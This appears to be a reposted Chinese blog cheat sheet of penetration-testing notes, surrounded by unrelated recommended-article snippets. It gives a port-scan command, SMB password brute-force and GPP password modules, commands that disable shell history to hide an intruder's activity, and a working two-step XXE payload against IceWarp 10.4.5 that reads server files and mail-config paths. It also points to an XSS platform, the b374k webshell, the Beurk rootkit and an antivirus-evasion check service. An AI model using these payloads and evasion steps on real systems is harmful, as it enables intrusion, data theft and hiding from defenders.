0329bak

最新推荐文章于 2024-07-23 14:16:29 发布
最新推荐文章于 2024-07-23 14:16:29 发布
阅读量96 收藏
点赞数
文章标签: 操作系统 php
原文链接:http://www.cnblogs.com/esthermalley/p/6638194.html
版权

0x1 渗透测试信息搜集

https://bbs.ichunqiu.com/thread-16020-1-1.htm

0x2 nmap 扫描常用端口命令

nmap -sT -P0 -sV -O --script=banner -p T:21-25,80-89,110,143,443,513,873,1080,1433,1521,1158,3306-3308,3389,3690,5900,6379,7001,8000-8090,9000,9418,27017-27019,50060,111,11211,2049 -oN name.txt 5*.1**.8.*

0x3 在线xss平台

http://webxss.top/xss/

0x4 接入kali的渗透准备

infomation gathering

https://www.offensive-security.com/metasploit-unleashed/hunting-mssql/
smb_version
search portscan
auxiliary/scanner/portscan/tcp
auxiliary/scanner/portscan/syn

1)
domain admins brute password
smb_login module

2)
gpp password

3)
port service web

0x5 linux无记录渗透

unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0

0x6 icewarp 10.4.5xxe injection

target:https://mail.***.com/rpc/gw.html

post下面的payload 

分两步走第一步得到value,填入第二步

验证目录c:/windows/win.ini

icewarp默认安装目录如下

c:/PROGRA~2/IceWarp/config/domains.cfg

c:/PROGRA~2/IceWarp/config/***/users.cfg

***从第一个目录读出来的domain site

users.cfg已加密

payload1:
<?xml version="1.0"?>
<methodCall>
<methodName>LoginUser</methodName>
<params>
<param><value></value></param>
</params>
</methodCall>

90ae4b8c70ba07ab8c82024a488b3da6

payload2:
<?xml version="1.0"?>
<!DOCTYPE OpenVAS [<!ENTITY bar SYSTEM "php://filter/read=convert.base64-encode/resource=c:/windows/win.ini">]>
<methodCall>
<methodName>ConvertVersit</methodName>
<params>
<param><value>90ae4b8c70ba07ab8c82024a488b3da6</value></param>
<param><value>OpenVAS;&bar;</value></param>
<param><value>XML</value></param>
</params>
</methodCall>

0x7 burpsuite抓https

网络设置设置成适合所有协议,在浏览器网络设置里把勾打上

buresuie

proxy->options->edit->certificate->use a self-signed certificates

0x8 cloundfare查询真实ip

http://www.crimeflare.com/cfs.html#box

0x9 文件包含漏洞webshell

b374k

0x10 查询相同服务器上的其他网站

http://www.yougetsignal.com/tools/web-sites-on-web-server/

0x11 linux rootkit

Beurk

0x12 不上传测试查杀情况

nodistribute.com

 

转载于:https://www.cnblogs.com/esthermalley/p/6638194.html

weixin_30709929
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
jw03连数据库
m0_64273143的博客
03-29 941
<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Con..
解包bak文件
12-28
解包bak文件。
camera GC0329 GetInfo和GetResoluion的区别
Gunter的专栏
08-31 1077
GetInfo函数获取并设置了Sensor所处的模式、设置好需要的各种时钟、快门和拍照获取图像的信息整个流程的参数; 而GetResolution函数却是设置图像在预览模式下的参数,实际上是通过对实际捕获的图像缩放来提高预览时图像的解析度。
Icewarp Web Mail存在多个安全漏洞
风信子的专栏
02-19 1656
 受影响系统:Icewarp Web Mail 5.3.2Icewarp Web Mail 5.3.0描述:--------------------------------------------------------------------------------MERAK Mail Server使用Icewarp Web Mail作为WEB邮件系统。Icewa
MySQL入门与初步--开始学习笔记-2014-0329
weixin_30914981的博客
03-29 49
1.登录数据库>mysql -h localhost -u root -p 数据库名称 2.查询所有的数据库 >show databases; 3.选择数据库 >use 数据库名; 4.查询所有数据表>show tables; 5.查询表的字段信息>desc 表名称; 6.1.修改某个表的字段类型及指定为空或非空>alter table 表名称 c...
mv 命令批量移动文件夹
热门推荐
bitbiter
04-12 2万+
这是第一次使用markdown编辑器写blog虽然不是很熟练,但是用起来还是感觉不错。MV命令mv 源 目标ls如下,要将包含day的文件夹移动到c_basis,一个一个的mv就太low了van@ubuntu:~/itcast$ ls 10day0401 12day0403 3day0321 5day0323 6day0324 8day0327 c_basis c
【ORACLE】报错IMP-00058ORA-00942
Ask Self,Ask Tomorrow
03-01 1362
【原因】检查了一下导出的日志,发现了问题: 一、dmp文件是由10.02.01导出的 二、目标库的版本是10.2.0.1.0 三、导入dmp用的客户端是11.2.0.1.0 估计是版本的问题导致,我直接到目标数据的服务器导数据,导入一切正常。 为什么有些表能正常导入,有些表有问题呢?检查的结果是,所有不能正常导入的表中都含有CLOB字段。--Error log连接到: Ora
web03
SLKLl0808的博客
03-29 68
Web03 一,课堂代码 1,注册页面 <h2>注册页面</h2> <form action="dologin.jsp" method="post"> id:<input type="text" name="iid"><br> 用户名:<input type="text" name="iname"><br> 密码:<input type="passwo
linux系统日常管理
weixin_34010949的博客
08-28 576
监控系统的状态 1. w查看当前系统的负载   相信所有的linux管理员最常用的命令就是这个 w 了,该命令显示的信息还是蛮丰富的。 第一行从左面开始显示的信息依次为:时间,系统运行时间,登录用户数,平均负载。 第二行开始以及下面所有的行,告诉我 们的信息是,当前登录的都有哪些用户,以及他们是从哪里登录的等等。 其实,在这些信息当中,我们最应该关注的应该是第一...
操作系统关闭透明大页指南
qq_40349881的博客
04-01 4513
引言 Oracle数据库是一个很吃内存的软件,生产环境安装数据库后需要开启大页来管理数据库内存的使用。同时需要关闭操作系统的透明大页,为什么要关闭透明大页呢? 由于透明大页已知会导致意外的节点重新启动并导致rac出现性能问题。因此oracle强烈建议禁用透明页。及时在单实例环境中透明大页也会导致性能问题,所以oracle 建议关闭操作系统上的透明大页。 现提供禁用方式,此次测试环境为redhat7.6,与其他版本略有不同,亲测有效 方法1 查看透明大页是否有值 [oracle@rhapp2 ~]$ cat
SQL BAK Reader
04-02
Open your SQL Server backup file using SQL BAK Reader, and all the details of that file will be displayed. The output is similar to the RESTORE HEADERONLY and RESTORE FILELISTONLY results.Does not ...
LED.zip_BAK-010
09-24
本话题主要围绕"LED.zip_BAK-010"展开,这是一个与51单片机和C语言编程相关的项目,可能是一个关于LED循环显示的程序备份文件。 51单片机是飞利浦(现恩智浦)公司推出的一种8位微控制器,由于其结构简单、性价比高...
BAK.rar_bak_数据库备份
09-22
标题中的"BAK.rar_bak_数据库备份"表明这是一个关于数据库备份的文件,通常在IT领域,".rar"是常见的压缩文件格式,用于打包和压缩多个文件或文件夹。"bak"在这里通常指的是备份文件的扩展名,尤其在数据库管理中,...
HarmonyOS应用开发者高级认证,Next版本发布后最新题库 - 多选题序号4
Gusha_的博客
07-23 626
HarmonyOS应用开发者高级认证最新题库,编写于2024年7月19日,Next版本发布之后
go--本地下载包
最新发布
weixin_63566388的博客
07-23 234
下载完成后,你可以验证包是否已正确下载。下载并安装适合你操作系统的版本。:确保已经安装 Go。
windows cmd和PowerShell两种命令行工具区别;常见 PowerShell 命令;ps1脚本例子
weixin_42357472的博客
07-19 371
是 Windows 操作系统中两种不同的命令行解释器,它们在设计理念、功能和命令语法上有很大的区别。
LG 选择 Flutter 来增强其智能电视操作系统 webOS
恋猫de小郭的博客
07-17 1894
总的来说,LG 是 Flutter 在 TV 领域的一次新的尝试,并且它是在脱离了 Android 平台的场景下实现的支持,虽然 webOS 并不是什么流行的系统,但是这也体现出了 Flutter 的特点:可以用较低的成本实现较好性能的跨平台。后续,在 LG 的主导下,WebOS 经过进一步修改,转变为智能电视操作系统,于是 WebOS TV 就诞生了,此后 LG 的 TV 基本路线定为 webOS ,在应用层面,WebOS TV 以基于 Web 的技术为基础。然后 LG 为什么选择 webOS?
linux学习笔记整理: 关于linux:Shell脚本 2024/7/20;
gzx233的博客
07-20 871
Shell脚本的使用
小米 .bak 恢复
12-15
小米手机的 .bak 文件是备份文件的扩展名,用于存储手机数据的备份。如果要恢复小米手机上的 .bak 文件,首先需要确认备份文件的来源,它可以是通过小米手机自带的备份功能生成的,也可以是通过第三方备份工具生成的。 如果是通过小米手机自带的备份功能生成的 .bak 文件,可以通过以下步骤来恢复数据:打开小米手机的设置,找到“备份和重置”选项,选择“恢复数据”,然后选择相应的 .bak 文件进行恢复。 如果是通过第三方备份工具生成的 .bak 文件,则需要使用相应的备份工具软件来进行恢复操作,通常是通过软件自带的还原功能来选择对应的 .bak 文件进行数据恢复。 在恢复 .bak 文件时,一定要注意备份文件的完整性和正确性,避免恢复过程中出现意外导致数据损坏。另外,还要注意备份文件的版本和对应的系统版本是否匹配,以免造成不兼容的问题。 总的来说,恢复小米手机上的 .bak 文件需要根据备份文件的来源和生成方式来选择正确的恢复方法,并在操作时要注意数据的完整性和兼容性,以确保顺利完成数据恢复。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值